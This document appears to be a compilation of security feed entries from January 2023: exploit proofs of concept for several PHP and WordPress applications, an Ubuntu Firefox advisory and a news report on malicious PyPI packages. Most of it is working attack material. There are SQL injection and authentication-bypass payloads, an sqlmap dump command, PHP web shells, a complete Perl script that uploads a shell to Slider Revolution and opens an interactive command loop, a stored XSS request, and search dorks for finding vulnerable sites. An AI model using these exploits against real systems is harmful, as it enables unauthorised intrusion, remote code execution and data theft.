Online Food Ordering System version 2.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Food Ordering System v2 - Sql Injection (Time-Based Blind)# Date: 01/10/2023# Exploit Author: Anıl Kızıltan# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code# Version: 2.0 # Tested on: Macos / XAMPP# username parameter is vulnerable to sql injection. You can exploit this sqlmap command: (First save this raw request as req.txt)# sqlmap -r req.txt -p username --dump-all####### Raw Request #######POST /fos/admin/ajax.php?action=login HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 32Origin: http://localhostConnection: closeReferer: http://localhost/fos/admin/login.phpCookie: language=en; welcomebanner_status=dismiss; continueCode=LoPJXWEAqruytmUYHrT4FDiBZikOH1Vh8Zh7JHvLtppI9VCvXHEYd7ywQ1B5; cookieconsent_status=dismiss; PHPSESSID=eje1menuonpvjtfbl2ri965btkSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originusername='-sleep(1)-'&password=a

Online Food Ordering System 2.0 SQL Injection

Online Food Ordering System version 2.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Online Food Ordering System v2 - Remote Code Execution (RCE) (Unauthenticated)  
# Date: 01/10/2023  
# Exploit Author: Hakan Sonay  
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code  
# Version: 2.0   
# Tested on: Windows 10 / XAMPP

############## Unauthenticated File Upload Request ##############

POST /fos/admin/ajax.php?action=save_settings HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0  
Accept: */*  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------19276025152284567381240485635  
Content-Length: 831  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/fos/admin/index.php?page=site_settings  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------19276025152284567381240485635  
Content-Disposition: form-data; name="name"

Online Food Ordering System V2  
-----------------------------19276025152284567381240485635  
Content-Disposition: form-data; name="email"

info@sample.com  
-----------------------------19276025152284567381240485635  
Content-Disposition: form-data; name="contact"

+6948 8542 623  
-----------------------------19276025152284567381240485635  
Content-Disposition: form-data; name="about"

<p>shell command:</p><p>/assets/img/<file_name>.php?cmd=whoami</p>  
-----------------------------19276025152284567381240485635  
Content-Disposition: form-data; name="img"; filename="rev_shell.php"  
Content-Type: text/php

<?php   
echo system($_GET['cmd']);  
?>

-----------------------------19276025152284567381240485635--

############## Command Execution Request ##############

http://localhost/fos/assets/img/****rev_shell.php?cmd=[Payload]

Online Food Ordering System 2.0 Shell Upload

Ubuntu Security Notice 5782-3 - USN-5782-1 fixed vulnerabilities in Firefox. The update introduced several minor regressions. This update fixes the problem. It was discovered that Firefox was using an out-of-date libusrsctp library. An attacker could possibly use this library to perform a reentrancy issue on Firefox. Nika Layzell discovered that Firefox was not performing a check on paste received from cross-processes. An attacker could potentially exploit this to obtain sensitive information. Pete Freitag discovered that Firefox did not implement the unsafe-hashes CSP directive. An attacker who was able to inject markup into a page otherwise protected by a Content Security Policy may have been able to inject an executable script. Matthias Zoellner discovered that Firefox was not keeping the filename ending intact when using the drag-and-drop event. An attacker could possibly use this issue to add a file with a malicious extension, leading to execute arbitrary code. Hafiizh discovered that Firefox was not handling fullscreen notifications when the browser window goes into fullscreen mode. An attacker could possibly use this issue to spoof the user and obtain sensitive information. Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5782-3  
January 10, 2023

firefox regressions  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

USN-5782-1 caused some minor regressions in Firefox.

Software Description:  
- firefox: Mozilla Open Source web browser

Details:

USN-5782-1 fixed vulnerabilities in Firefox. The update introduced  
several minor regressions. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 It was discovered that Firefox was using an out-of-date libusrsctp library.  
 An attacker could possibly use this library to perform a reentrancy issue  
 on Firefox. (CVE-2022-46871)

  Nika Layzell discovered that Firefox was not performing a check on paste  
 received from cross-processes. An attacker could potentially exploit this  
 to obtain sensitive information. (CVE-2022-46872)

  Pete Freitag discovered that Firefox did not implement the unsafe-hashes  
 CSP directive. An attacker who was able to inject markup into a page  
 otherwise protected by a Content Security Policy may have been able to  
 inject an executable script. (CVE-2022-46873)

  Matthias Zoellner discovered that Firefox was not keeping the filename  
 ending intact when using the drag-and-drop event. An attacker could  
 possibly use this issue to add a file with a malicious extension, leading  
 to execute arbitrary code. (CVE-2022-46874)

  Hafiizh discovered that Firefox was not handling fullscreen notifications  
 when the browser window goes into fullscreen mode. An attacker could  
 possibly use this issue to spoof the user and obtain sensitive information.  
 (CVE-2022-46877)

  Multiple security issues were discovered in Firefox. If a user were  
 tricked into opening a specially crafted website, an attacker could  
 potentially exploit these to cause a denial of service, obtain sensitive  
 information across domains, or execute arbitrary code. (CVE-2022-46878,   
 CVE-2022-46879)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
  firefox                         108.0.2+build1-0ubuntu0.20.04.1

Ubuntu 18.04 LTS:  
  firefox                         108.0.2+build1-0ubuntu0.18.04.1

After a standard system update you need to restart Firefox to make all the  
necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5782-3  
  https://ubuntu.com/security/notices/USN-5782-1  
  https://launchpad.net/bugs/2002377

Package Information:  
  https://launchpad.net/ubuntu/+source/firefox/108.0.2+build1-0ubuntu0.20.04.1  
  https://launchpad.net/ubuntu/+source/firefox/108.0.2+build1-0ubuntu0.18.04.1

Ubuntu Security Notice USN-5782-3

WordPress Mega Main Menu plugin version 2.2.2 suffers from a backup disclosure vulnerability.

    ====================================================================================================================================| # Title     : WordPress Menu Plugin - Mega Main Menu v2.2.2 unauthorized backup download Vulnerability                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(32-bit)                                            | | # Vendor    : https://codecanyon.net/item/mega-main-menu-wordpress-menu-plugin/6135125                                           |  | # Dork      : "/wp-content/plugins/mega_main_menu/"                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The Vulnerability does not allow you to download a copy of the site's database, but rather a backup copy of the plugin's settings file.[+] Use payload : /wp-admin/?mmm_page=backup_file [+] https://127.0.0.1/lazarolacom/testeo/wp-admin/?mmm_page=backup_fileGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

WordPress Mega Main Menu 2.2.2 Information Disclosure

WordPress Slider Revolution plugin version 4.6.5 suffers from a remote shell upload vulnerability.

====================================================================================================================================  
| # Title     : WordPress - Slider Revolution 4.6.5 WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit                 |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               |   
| # Vendor    : https://www.sliderrevolution.com/                                                                                  |    
| # Dork      : index off revslider\backup                                                                                         |  
====================================================================================================================================

[+] poc :

[+] Web shell upload :

    The following perl exploit will attempt to load the HTTP php shell through the update_plugin function  
    To use the exploit, be sure to compress the backdoor file  
    Because the exploit uploads a compressed file to the target

  [+] simple backdoor  :

     <?php  
     $cmd = $_GET['cmd'];  
     system($cmd);  
     ?> 

[+] Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension (indoushka.zip)

[+] The exploit and the backdoor must be in the same folder and path

[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine 

[+] Perl exploit :

 #!/usr/bin/perl  
#  
# Title     :WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit   
# Author    :indoushka  
# Vendor    :https://www.sliderrevolution.com/

use LWP::UserAgent;  
use MIME::Base64;  
use strict;

sub banner {  
system(($^O eq 'MSWin32') ? 'cls' : 'clear');  
print "   ============[+] Author : indoushka[+]===================\n";  
print "[+] Slider Revolution 4.6.5 shell upload 0-day exploit     [+]\n";  
print "   ========================================================   \n";  
print "[+] Uploading an web shell:                                [+]\n";  
print "[+] The following perl exploit will attempt to load the    [+]\n";   
print "[+] HTTP php backdoor through the update_plugin function   [+]\n";  
print "[+] To use the exploit, make sure you compress the backdoor[+]\n";   
print "============================================================== \n";  
system('color a');  
}

if (!defined ($ARGV[0] && $ARGV[1])) {  
banner();  
print "perl $0 <target> <plugin>\n";  
print "perl $0 http://localhost revslider\n";  
exit;  
}

my $zip1 = "indoushka.zip";

unless (-e ($zip1))  
{   
banner();  
print "[-] $zip1 not found! RTFM\n";  
exit;  
}

my $host = $ARGV[0];  
my $plugin = $ARGV[1];  
my $action;  
my $update_file;

if ($plugin eq "revslider") {  
$action = "revslider_ajax_action";  
$update_file = "$zip1";  
}  
elsif ($plugin eq "showbiz") {  
$action = "showbiz_ajax_action";

}  
else {  
banner();  
print "[-] Wrong plugin name\n";  
print "perl $0 <target> <plugin>\n";  
print "perl $0 http://localhost revslider\n";  
exit;  
}  
my $target = "wp-admin/admin-ajax.php";  
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php"; 

sub randomagent {  
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',  
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',  
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',  
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',  
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',  
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'  
);  
my $random = $array[rand @array];  
return($random);  
}  
my $useragent = randomagent();

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });  
$ua->timeout(10);  
$ua->agent($useragent);  
my $status = $ua->get("$host/$target");  
unless ($status->is_success) {  
banner();  
print "[-] Xploit failed: " . $status->status_line . "\n";  
exit;  
}

banner();  
print "[*] Target set to $plugin\n";  
print "[*] MorXploiting $host\n";

my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);

print "[*] Sent payload\n";

if ($exploit->decoded_content =~ /Wrong update extracted folder/) {  
print "[+] Payload successfully executed\n";  
}

elsif ($exploit->decoded_content =~ /Wrong request/) {  
print "[-] Payload failed: Not vulnerable\n";  
exit;  
}

elsif ($exploit->decoded_content =~ m/0$/) {  
print "[-] Payload failed: Plugin unavailable\n";  
exit;  
}

else {  
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;  
print "[-] Payload failed:$1\n";  
print "[-] " . $exploit->decoded_content unless (defined $1);  
print "\n";  
exit;  
}

print "[*] Checking if shell was uploaded\n";

sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }  
my $rndstr = rndstr(8, 1..9, 'a'..'z');  
my $cmd1 = encode_base64("echo $rndstr");  
my $status = $ua->get("$host/$shell?cmd=$cmd1");

if ($status->decoded_content =~ /system has been disabled/) {  
print "[-] Xploit failed: system() has been disabled\n";  
exit;  
}

elsif ($status->decoded_content !~ /$rndstr/) {  
print "[-] Xploit failed: " . $status->status_line . "\n";  
exit;  
}

elsif ($status->decoded_content =~ /$rndstr/) {  
print "[+] Shell successfully uploaded\n";  
}  
my $cmd2 = encode_base64("whoami");  
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");  
my $cmd3 = encode_base64("uname -n");  
my $uname = $ua->get("$host/$shell?cmd=$cmd3");  
my $cmd4 = encode_base64("id");  
my $id = $ua->get("$host/$shell?cmd=$cmd4");  
my $cmd5 = encode_base64("uname -a");  
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");  
print $unamea->decoded_content;   
print $id->decoded_content;  
my $wa = $whoami->decoded_content;  
my $un = $uname->decoded_content;  
chomp($wa);  
chomp($un);

while () {  
print "\n$wa\@$un:~\$ ";  
chomp(my $cmd=<STDIN>);  
if ($cmd eq "exit")   
{   
print "Aurevoir!\n";  
exit;  
}  
my $ucmd = encode_base64("$cmd");  
my $output = $ua->get("$host/$shell?cmd=$ucmd");  
print $output->decoded_content;  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |  
                                                                                                                                      |  
=======================================================================================================================================

WordPress Slider Revolution 4.6.5 Shell Upload

Sourcecodester Dynamic Transaction Queuing System v1.0 is vulnerable to SQL Injection via /queuing/index.php?page=display&id=.

Permalink

Cannot retrieve contributors at this time

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

BUG\_Author: xtxxueyan

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/index.php?page=display&id=

Vulnerability location: /queuing/index.php?page=display&id=, id

dbname =queuing\_db

\[+\] Payload: /queuing/index.php?page=display&id=-4%20union%20select%201,database(),3--+ // Leak place ---> id

GET /queuing/index.php?page\=display&id\=\-4%20union%20select%201,database(),3\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close

CVE-2022-47790: bug_report/SQLi-1.md at main · xtxxueyan/bug_report

Eatself version 1.1.5 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Eatself v1.1.5 Auth By Pass Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://eatself.com/                                                                                               |  | # Dork      : " © Eatself. Tous droits réservés - v1.1.5."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : 'or''='@gmail.com& Pass : 'or''=' (toltal control of admin panel )[+] https://127.0.0.1/app.eatself/admin-loginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Eatself 1.1.5 SQL Injection

Excel Net Computer Institute version 4.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Excel Net Computer Institute Version 4.1 SQL injection authentication bypass Vulnerability                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.excelnet.org/                                                                                          |  | # Dork      : "photos_view.php?pid="                                                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use path (/new/) to access at admin panel & Full control of website .[+] Use payload for login information = user & pass : 1' or 1=1 -- -[+] https://127.0.0.1/excelnet.41org/new/lead_home.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Excel Net Computer Institute 4.1 SQL Injection

In yet another campaign targeting the Python Package Index (PyPI) repository, six malicious packages have been found deploying information stealers on developer systems.
The now-removed packages, which were discovered by Phylum between December 22 and December 31, 2022, include pyrologin, easytimestamp, discorder, discord-dev, style.py, and pythonstyles.
The malicious code, as is increasingly

Network Security / Supply Chain

In yet another campaign targeting the Python Package Index (PyPI) repository, six malicious packages have been found deploying information stealers on developer systems.

The now-removed packages, which were discovered by Phylum between December 22 and December 31, 2022, include pyrologin, easytimestamp, discorder, discord-dev, style.py, and pythonstyles.

The malicious code, as is increasingly the case, is concealed in the setup script (setup.py) of these libraries, meaning running a "pip install" command is enough to activate the malware deployment process.

The malware is designed to launch a PowerShell script that retrieves a ZIP archive file, install invasive dependencies such as pynput, pydirectinput, and pyscreenshot, and run a Visual Basic Script extracted from the archive to execute more PowerShell code.

"These libraries allow one to control and monitor mouse and keyboard input and capture screen contents," Phylum said in a technical report published last week.

The rogue packages are also capable of harvesting cookies, saved passwords, and cryptocurrency wallet data from Google Chrome, Mozilla Firefox, Microsoft Edge, Brave, Opera, Opera GX, and Vivaldi browsers.

But in what's a novel technique adopted by the threat actor, the attack further attempts to download and install cloudflared, a command-line tool for Cloudflare Tunnel, which offers a "secure way to connect your resources to Cloudflare without a publicly routable IP address."

The idea, in a nutshell, is to leverage the tunnel to remotely access the compromised machine via a Flask-based app, which harbors a trojan dubbed xrat (but codenamed poweRAT by Phylum).

The malware enables the threat actor to run shell commands, download remote files and execute them on the host, exfiltrate files and entire directories, and even run arbitrary python code.

The Flask application also supports a "live" feature that uses JavaScript to listen to mouse and keyboard click events and capture screenshots of the system in order to grab any sensitive information entered by the victim.

"This thing is like a RAT on steroids," Phylum said. "It has all the basic RAT capabilities built into a nice web GUI with a rudimentary remote desktop capability and a stealer to boot!"

The findings are yet another window into how attackers are continuously evolving their tactics to target open source package repositories and stage supply chain attacks.

Late last month, Phylum also disclosed a number of fraudulent npm modules that were found exfiltrating environment variables from the installed systems.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Malicious PyPI Packages Using Cloudflare Tunnels to Sneak Through Firewalls

A reflected cross-site scripting (XSS) vulnerability in maccms10 v2022.1000.3032 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the AD Management module.

**CVE-2022-44870**

maccms admin+ xss attacks

Overview

Manufacturer's website information：https://maccms.pro

Source code download address ： https://github.com/maccmspro/maccms10.git

1.  Affected version: V2021.1000.2000

2.Vulnerability details

maccmspro/maccms10#23

Go to background, go to Basics > AD Management > Name,

Insert payload1 in the name box:

It can cause XSS attacks.

Vulnerability name：Storage type xss

Vulnerability level：Medium risk

Vulnerability location： Advertising management-->name

Insert <script>alert(1)</script> at cat\_title

http://127.0.0.1/admin.php/admin/banner/infocat.html

3.Recurring vulnerabilities and POC

POST /admin.php/admin/banner/infocat.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0

Accept: _/_

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 65

Origin: http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/banner/infocat.html

Cookie: PHPSESSID=qgaks01bl6ip8j7fseaabj4l9q

cat\_id=&cat\_title=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cat\_code=111

Tag

#firefox